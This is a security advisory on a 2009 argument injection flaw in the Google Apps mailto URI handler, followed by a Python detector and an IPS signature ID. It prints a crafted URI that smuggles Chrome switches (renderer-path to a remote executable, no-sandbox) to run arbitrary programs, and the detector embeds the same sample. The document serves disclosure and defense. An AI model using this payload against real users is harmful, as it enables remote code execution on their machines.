Google Apps URI Argument Injection
October 16, 2009
Google Apps is a service from Google featuring several Web applications with functionality similar to traditional office suites, including Gmail, Google Calendar, Talk, Docs and Sites. When Google Apps is installed, the application registers a handler for the googleapps.url.mailto:// URI scheme. The generic format of the scheme is as follows:
googleapps.url.mailto://
Google Apps supports multiple command-line options. One such argument, "--domain", causes Google Chrome to start and process the specified URL. Google Chrome also supports multiple command-line options. The "--no-sandbox" argument disables Google Chrome's security sandbox, and the "--renderer-path" argument causes Google Chrome to execute the specified program, even from an SMB share.
There exists an argument injection vulnerability in Google Apps. Specifically, the vulnerability resides in the processing of a googleapps.url.mailto:// URI that contains double-quotes ("). By combining the "--domain", "--renderer-path" and "--no-sandbox" arguments, one can have Google Chrome execute arbitrary commands. A generic example of such a malicious URL looks like:
'googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\HOSTPATHMALICIOUS.exe%20--no-sandbox%20--x"/'
which will execute the following command:
chrome.exe --renderer-path=\HOSTPATHMALICIOUS.exe --no-sandbox
Google Chrome will not ask for user permission or otherwise notify the user of such commands. Remote attackers could exploit this vulnerability by enticing a target user to open a web page containing a specially crafted googleapps.url.mailto:// URI. Successful exploitation would result in the injection and execution of commands passed to the Google Chrome program. The vulnerability has been assigned Bugtraq ID 36581. It affects Google Apps v1.1.110 6031 and prior.
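As an added example (not part of the original advisory or of any SonicWALL signature), the following Python detector applies the advisory's logic to a URI: a double-quote that breaks out of the quoted URL argument, followed by Chrome switches such as "--renderer-path" or "--no-sandbox", is flagged as argument injection. The watch-list of switches and the sample URIs are constructed for this example.

```python
import re
from typing import List
from urllib.parse import unquote

SCHEME = "googleapps.url.mailto:"

# Chrome switches named in the advisory whose presence in an injected
# argument list indicates the attack. Watch-list constructed for this example.
DANGEROUS_SWITCHES = {"--renderer-path", "--no-sandbox"}


def injected_switches(uri: str) -> List[str]:
    """Return the command-line switches smuggled into a googleapps.url.mailto URI.

    The handler hands the URI text to the launcher inside a quoted argument.
    A double-quote inside the URI closes that argument, so any '--option'
    after it is parsed as a separate command-line switch.
    """
    decoded = unquote(uri)  # %20 and friends become literal characters
    if not decoded.lower().startswith(SCHEME):
        return []
    if '"' not in decoded:
        return []  # no quote break-out, so nothing can be injected
    tail = decoded.split('"', 1)[1]  # text that escapes the quoted argument
    return re.findall(r"--[A-Za-z0-9-]+", tail)


def is_argument_injection(uri: str) -> bool:
    """True when a quote break-out carries at least one dangerous switch."""
    return any(s in DANGEROUS_SWITCHES for s in injected_switches(uri))


# Constructed samples: the advisory's generic malicious URL and a benign one.
SAMPLE_MALICIOUS = (
    r'googleapps.url.mailto://"%20--domain="--x%20'
    r'--renderer-path=\HOSTPATHMALICIOUS.exe%20--no-sandbox%20--x"/'
)
SAMPLE_BENIGN = "googleapps.url.mailto://user@example.com"

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(is_argument_injection(sample), injected_switches(sample))
```

The check is purely lexical and is meant for log review or a proxy filter; it does not replace the IPS signature below.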
SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:
- 3174 - Google Apps URI Argument Injection